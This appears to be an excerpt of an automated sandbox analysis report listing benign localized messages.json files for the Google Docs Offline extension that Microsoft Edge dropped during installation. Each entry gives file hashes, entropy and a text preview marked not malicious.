Preview:	{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\eu\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	838
Entropy (8bit):	4.4975520913636595
Encrypted:	false
SSDEEP:	24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
MD5:	29A1DA4ACB4C9D04F080BB101E204E93
SHA1:	2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
SHA-256:	A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
SHA-512:	B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
Malicious:	false
Preview:	{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\fa\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1305
Entropy (8bit):	4.673517697192589
Encrypted:	false
SSDEEP:	24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
MD5:	097F3BA8DE41A0AAF436C783DCFE7EF3
SHA1:	986B8CABD794E08C7AD41F0F35C93E4824AC84DF
SHA-256:	7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
SHA-512:	8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\fi\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	911
Entropy (8bit):	4.6294343834070935
Encrypted:	false
SSDEEP:	12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
MD5:	B38CBD6C2C5BFAA6EE252D573A0B12A1
SHA1:	2E490D5A4942D2455C3E751F96BD9960F93C4B60
SHA-256:	2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
SHA-512:	6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
Malicious:	false
Preview:	{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\fil\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	939
Entropy (8bit):	4.451724169062555
Encrypted:	false
SSDEEP:	24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
MD5:	FCEA43D62605860FFF41BE26BAD80169
SHA1:	F25C2CE893D65666CC46EA267E3D1AA080A25F5B
SHA-256:	F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
SHA-512:	F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
Malicious:	false
Preview:	{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\fr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	977
Entropy (8bit):	4.622066056638277
Encrypted:	false
SSDEEP:	24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
MD5:	A58C0EEBD5DC6BB5D91DAF923BD3A2AA
SHA1:	F169870EEED333363950D0BCD5A46D712231E2AE
SHA-256:	0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
SHA-512:	B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\fr_CA\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	972
Entropy (8bit):	4.621319511196614
Encrypted:	false
SSDEEP:	24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
MD5:	6CAC04BDCC09034981B4AB567B00C296
SHA1:	84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
SHA-256:	4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
SHA-512:	160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\gl\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	990
Entropy (8bit):	4.497202347098541
Encrypted:	false
SSDEEP:	12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
MD5:	6BAAFEE2F718BEFBC7CD58A04CCC6C92
SHA1:	CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
SHA-256:	0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
SHA-512:	3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\gu\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1658
Entropy (8bit):	4.294833932445159
Encrypted:	false
SSDEEP:	24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
MD5:	BC7E1D09028B085B74CB4E04D8A90814
SHA1:	E28B2919F000B41B41209E56B7BF3A4448456CFE
SHA-256:	FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
SHA-512:	040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\hi\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1672
Entropy (8bit):	4.314484457325167
Encrypted:	false
SSDEEP:	48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
MD5:	98A7FC3E2E05AFFFC1CFE4A029F47476
SHA1:	A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
SHA-256:	D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
SHA-512:	457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
Malicious:	false
Preview:	{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\hr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	935
Entropy (8bit):	4.6369398601609735
Encrypted:	false
SSDEEP:	24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
MD5:	25CDFF9D60C5FC4740A48EF9804BF5C7
SHA1:	4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
SHA-256:	73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
SHA-512:	EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
Malicious:	false
Preview:	{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\hu\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1065
Entropy (8bit):	4.816501737523951
Encrypted:	false
SSDEEP:	24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
MD5:	8930A51E3ACE3DD897C9E61A2AEA1D02
SHA1:	4108506500C68C054BA03310C49FA5B8EE246EA4
SHA-256:	958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
SHA-512:	126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\hy\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2771
Entropy (8bit):	3.7629875118570055
Encrypted:	false
SSDEEP:	48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
MD5:	55DE859AD778E0AA9D950EF505B29DA9
SHA1:	4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
SHA-256:	0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
SHA-512:	EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
Malicious:	false
Preview:	{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\id\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	858
Entropy (8bit):	4.474411340525479
Encrypted:	false
SSDEEP:	12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
MD5:	34D6EE258AF9429465AE6A078C2FB1F5
SHA1:	612CAE151984449A4346A66C0A0DF4235D64D932
SHA-256:	E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
SHA-512:	20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
Malicious:	false
Preview:	{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\is\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	954
Entropy (8bit):	4.6457079159286545
Encrypted:	false
SSDEEP:	12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
MD5:	CAEB37F451B5B5E9F5EB2E7E7F46E2D7
SHA1:	F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
SHA-256:	943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
SHA-512:	A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
Malicious:	false
Preview:	{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\it\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	899
Entropy (8bit):	4.474743599345443
Encrypted:	false
SSDEEP:	12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
MD5:	0D82B734EF045D5FE7AA680B6A12E711
SHA1:	BD04F181E4EE09F02CD53161DCABCEF902423092
SHA-256:	F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
SHA-512:	01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\iw\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2230
Entropy (8bit):	3.8239097369647634
Encrypted:	false
SSDEEP:	24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
MD5:	26B1533C0852EE4661EC1A27BD87D6BF
SHA1:	18234E3ABAF702DF9330552780C2F33B83A1188A
SHA-256:	BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
SHA-512:	450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
Malicious:	false
Preview:	{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\ja\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1160
Entropy (8bit):	5.292894989863142
Encrypted:	false
SSDEEP:	24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
MD5:	15EC1963FC113D4AD6E7E59AE5DE7C0A
SHA1:	4017FC6D8B302335469091B91D063B07C9E12109
SHA-256:	34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
